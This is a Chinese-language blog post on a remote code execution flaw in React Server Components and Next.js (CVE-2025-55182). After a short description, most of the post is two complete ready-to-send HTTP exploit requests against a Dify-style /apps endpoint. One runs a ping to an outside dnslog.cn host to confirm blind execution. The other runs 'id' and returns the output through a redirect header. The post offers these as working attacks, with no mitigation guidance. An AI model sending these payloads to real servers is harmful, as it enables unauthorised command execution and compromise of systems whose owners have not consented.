文章

Next.js/React Server Components远程代码执行漏洞

Posted 14 days ago Updated 14 days ago
By txf
8~10 min read

前言

React Server Components远程代码执行漏洞(CVE-2025-55182)

Next.js React Server Components远程代码执行漏洞(CVE-2025--66478)

React Server Components(RSC)是 React 19 的服务端渲染与组件流式传输机制,于 2024 年 12 月 5 日发布正式版本,用于在服务端解析组件与模型数据并输出渲染结果,受影响版本中,RSC 在处理 ReplyFlightStream 的反序列化数据时缺乏必要校验,攻击者可构造任意模型字段、循环结构、Server Reference 与 multipart/form\-data,诱使解析流程进入异常路径并触发模块加载与引用执行链,最终导致未授权代码执行。

Next.js 是基于 React 的开源 Web 框架,用于构建 SSR、静态站点与混合渲染应用。在受影响版本中,Next.js App Router 将来自客户端的 RSC 序列化数据时,由于 RSC 在处理 ReplyFlightStream 的反序列化数据时,攻击者可构造恶意请求,最终导致未授权代码执行。

POC

dify已沦陷,github poc (无回显rce)

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

POST /apps HTTP/1.1
Host: 10.166.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 585

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('ping zrodr5.dnslog.cn');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

回显EXP

POST /apps HTTP/1.1
Host: 10.166.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 585

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

License:  杭州小单纯